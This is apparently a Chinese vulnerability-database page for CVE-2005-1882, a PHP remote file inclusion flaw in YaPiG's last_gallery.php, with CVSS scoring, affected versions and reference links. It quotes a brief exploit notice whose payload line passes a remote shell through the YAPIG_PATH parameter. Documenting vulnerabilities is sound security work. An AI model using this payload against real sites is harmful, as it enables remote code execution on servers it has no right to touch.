CVE-2005-1882
CVSS7.5
发布时间 :2005-06-09 00:00:00
修订时间 :2008-09-05 16:50:20
NMCOE    

[原文]PHP remote file inclusion vulnerability in last_gallery.php in YaPiG 0.93u and 0.94u allows remote attackers to execute arbitrary PHP code via the YAPIG_PATH parameter.


[CNNVD]YaPiG 'last_gallery.php'脚本 PHP远程文件包含漏洞(CNNVD-200506-085)

        YaPiG 0.93u和0.94u版本中的的last_gallery.php脚本存在PHP远程文件包含漏洞,远程攻击者可借助YAPIG_PATH参数执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:yapig:yapig:0.94u
cpe:/a:yapig:yapig:0.93u

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1882
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1882
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200506-085
(官方数据源) CNNVD

- 其它链接及资源

http://www.osvdb.org/17117
(UNKNOWN)  OSVDB  17117
http://secwatch.org/advisories/secwatch/20050530_yapig.txt
(VENDOR_ADVISORY)  MISC  http://secwatch.org/advisories/secwatch/20050530_yapig.txt
http://securitytracker.com/id?1014103
(UNKNOWN)  SECTRACK  1014103
http://secunia.com/advisories/15600/
(VENDOR_ADVISORY)  SECUNIA  15600

- 漏洞信息

YaPiG 'last_gallery.php'脚本 PHP远程文件包含漏洞
高危 未知
2005-06-09 00:00:00 2006-09-28 00:00:00
远程  
        YaPiG 0.93u和0.94u版本中的的last_gallery.php脚本存在PHP远程文件包含漏洞,远程攻击者可借助YAPIG_PATH参数执行任意PHP代码。

- 公告与补丁

        

- 漏洞信息 (12164)

YaPig v0.94.0u Remote File Inclusion Vulnerability (EDBID:12164)
php webapps
2010-04-12 Verified
0 JIKO
[点击下载] [点击下载]
|=-----------------------------------------------------=|
  |=-------------=[  JIKO |No-exploit.Com|  ]=-----------=|
  |=-----------------------------------------------------=|
[~]-----------|00|
NAme    :JIKO (JAWAD)
Home    :No-exploit.Com
Mail    : !x!
[~]-----------|01|
    -{Script}
    name :YaPig V0.94.0u
    link :http://yapig.sourceforge.net/

[~]-----------|02|
    -{3xpl01t}
    http://no-exploit.com/last_gallery.php?YAPIG_PATH={Shell}
[~]-----------|03|
    -{Greetz}
    Cyber-Zone,HxH,Hussin X,ZaIdOoHxHaCkEr ,Stack,HiSoKa,The SadHacker,SkuLL-HacKeR ,Dr.NaNo
    |No-Exploit.com Members
-------------------------------------		

- 漏洞信息

17117
YaPiG last_gallery.php YAPIG_PATH Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public Third-party Verified

- 漏洞描述

YaPiG contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to last_gallery.php not properly sanitizing user input supplied to the YAPIG_PATH variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2005-06-04 2005-05-29
2005-06-04 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站